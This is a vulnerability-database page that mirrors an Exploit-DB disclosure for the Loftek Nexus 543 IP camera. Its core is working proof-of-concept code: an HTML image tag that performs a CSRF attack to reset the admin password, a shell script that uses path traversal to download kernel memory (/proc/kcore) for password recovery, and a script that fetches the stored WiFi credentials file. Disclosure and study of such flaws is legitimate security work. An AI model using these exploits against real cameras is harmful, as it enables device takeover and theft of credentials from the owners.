Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Loftek Nexus 543 IP Cameras - Multiple Vulnerabilities

🗓️ 26 Aug 2013 00:00:00Reported by Craig YoungType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 31 Views

Loftek Nexus 543 IP Cameras - Multiple Vulnerabilities CSRF, Memory Dump, WiFi Cred

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Loftek Nexus 543 IP Cameras CSRF Vulnerability
27 Aug 201300:00
zdt
CVE		CVE-2013-3311
21 Nov 201919:39
cve
CVE		CVE-2013-3314
21 Nov 201919:39
cve
Cvelist		CVE-2013-3311
21 Nov 201919:39
cvelist
Cvelist		CVE-2013-3314
21 Nov 201919:39
cvelist
EUVD		EUVD-2013-3247
7 Oct 202500:30
euvd
exploitpack		Loftek Nexus 543 IP Cameras - Multiple Vulnerabilities
26 Aug 201300:00
exploitpack
NVD		CVE-2013-3311
21 Nov 201920:15
nvd
NVD		CVE-2013-3314
21 Nov 201920:15
nvd
Prion		Directory traversal
21 Nov 201920:15
prion
Rows per page
CSRF:

<HTML><TITLE>Loftek Nexus 543 CSRF PoC</TITLE>
<IMG SRC="http://ip-camera-address/set_users.cgi?next_url=rebootme.htm&user1=admin&pwd1=password&pri1=2&user2=anon&pwd2=password&pri2=0&user3=&pwd3=&pri3=1&user4=&pwd4=&pri4=0&user5=&pwd5=&pri5=0&user6=&pwd6=&pri6=0&user7=&pwd7=&pri7=0&user8=&pwd8=&pri8=0" ALT="Your password has been reset to admin/password">
</HTML>


Memory Dump:

#!/bin/sh
# This script exploits CVE-2013-3311 to retrieve kernel memory from a Loftek Nexus 543 IP camera
# The file which is downloaded can be analyzed (strings) to recover passwords and other goodies


if [[ "$1x" != "x" && "$2x" != "x" ]]; then
	curl http://$1/../proc/kcore -o $2 
	exit
fi
echo "Usage: $0 Nexus-543-IP output_file" 

WiFi Creds:


#!/bin/sh
# This script exploits CVE-2013-3314 to retrieve wifi credentials from a Loftek Nexus 543 IP camera

if [ "$1x" != "x" ]; then
	curl http://$1/../etc/RT2870STA.dat
	exit
fi
echo "Usage: $0 Nexus-543-IP"

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
26 Aug 2013 00:00Current
7.7High risk
Vulners AI Score7.7
CVSS 25
CVSS 3.17.5
EPSS0.24633
loftek nexus 543ip camerascsrfmemory dumpwifi credentialsvulnerabilitiesexploitcve-2013-3311cve-2013-3314
31